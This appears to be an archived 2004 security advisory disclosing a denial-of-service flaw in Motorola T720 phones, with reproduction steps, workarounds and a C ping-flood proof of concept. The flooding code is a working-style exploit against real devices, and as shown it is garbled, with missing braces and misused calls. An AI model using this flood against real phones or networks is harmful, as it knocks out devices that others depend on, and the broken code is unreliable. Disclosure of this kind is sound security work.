what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New


Posted Mar 2, 2004
Authored by Shaun Colley | Site nettwerked.co.uk

Motorola T720 Cellular phones have a vulnerability that cause a denial of service when the phone receives an abnormal amount of IP traffic. Upon receiving the traffic, the phone powers-off when the user attempts to access the network.

tags | exploit, denial of service
SHA-256 | 3c3012ee943ab155015cb94a94a705b5b7f6384e9067ab8966ff66d07ec2c944


Change Mirror Download

Product: Motorola T720 Cell phones
Versions: T270
Bug: DoS vulnerability
Impact: Attacker's can reboot the cellphone
Date: March 01, 2004
Author: Shaun Colley
Email: shaunige@yahoo.co.uk
WWW: http://www.nettwerked.co.uk



"The Motorola T720 proves that the best technological
innovations carefully balance excitement and fun with
convenience and simplicity of use. Improve your
productivity and be one step ahead of the crowd with
digital customization and applications, or just kick
back and have a good time with creative entertainment
and messaging features. Either way, this phone is sure
to deliver a rich, compelling and truly unforgettable
wireless experience." - Vendor's website

The Motorola T720 cell phone is a very nice cell
phone, with plenty of fun features, including WAP
access to the Internet. Unfortunately, there is a
low-risk vulnerability which allows an attacker to
remotely reboot the cell phone easily.

The bug

The vulnerability lies within the TCP/IP stack of the
Motorola T720 cell phone. When the phone receives an
abnormal amount of IP traffic, the phone powers-off
when the user attempts to access the network (e.g
through the WAP browser).

The vulnerability can be reproduced in the following

1) Connect the phone to the Internet.
2) Flood the device with IP traffic (i.e SYN packets
or ICMP_ECHO requests (ping packets)).
3) Run the WAP browser.

At this point, the phone should power-off, and lose
network connectivity.


This vulnerability is likely due to a bug in the
phone's IP implementation which bails when a certain
backlog of IP packets is exceeded.

The exploit

A simple proof-of-concept is demonstrated below:

# motorolakill.c
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>

int main(int argc, char *argv[]) {
if(argc < 2) {
printf("Usage: %s <host>\n", argv[0]);

int sock;
char packet[5000];
int on = 1;
struct sockaddr_in dest;
struct hostent *host;
struct iphdr *ip = (struct iphdr *) packet;
struct icmphdr *icmp = (struct icmp *) packet
+ sizeof(struct iphdr);
if((host = gethostbyname(argv[1])) == NULL) {
printf("Couldn't resolve host!\n");

if((sock = socket(AF_INET, SOCK_RAW,
IPPROTO_ICMP)) == -1) {
printf("Couldn't make socket!\n");
printf("You must be root to create a
raw socket.\n");

if((setsockopt(sock, IPPROTO_IP, IP_HDRINCL,
(char *)&on, sizeof(on))) < 0) {

dest.sin_family = AF_INET;
dest.sin_addr = *((struct in_addr
ip->ihl = 5;
ip->id = htons(1337);
ip->ttl = 255;
ip->tos = 0;
ip->protocol = IPPROTO_ICMP;
ip->version = 4;
ip->frag_off = 0;
ip->saddr = htons("");
ip->daddr = inet_ntoa(dest.sin_addr);
ip->tot_len = sizeof(struct iphdr) +
sizeof(struct icmphdr);
ip->check = 0;
icmp->checksum = 0;
icmp->type = ICMP_ECHO;
icmp->code = 0;
printf("Ping flooding %s!\n", argv[1]);

/* begin flooding here. */
while(1) {
sendto(sock, packet, ip->tot_len, 0,
(struct sockaddr *)&dest, sizeof(struct sockaddr));
# EOF motorolakill.c

Use the steps listed above to reproduce the
vulnerability. The above programs shouldn't need long
to cause the phone to poweroff.

(please note the phone will only poweroff if the user
attempts to access the network. If the phone is
sitting idle, it won't be affected. The user must
open the WAP browser during the attack, for example.
This will cause the phone to poweroff quickly.)

The fix

No solution exists. Possible workarounds are:

- Connect the phone through a router (possibly via GSM
to allow roaming), filtering out all malicious traffic
to the device.

- Use another system as a gateway system, firewalling
the cellphone, and filtering traffic to the device.

Vendor Status

I have contacted the vendor regarding this low-risk
vulnerability. I shall update this if I get a
response, depending on whether Motorola verify issue
to be serious enough, or even an issue at all.

Thank you for your time.

Yahoo! Messenger - Communicate instantly..."Ping"
your friends today! Download Messenger Now
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    16 Files
  • 18
    Jun 18th
    26 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By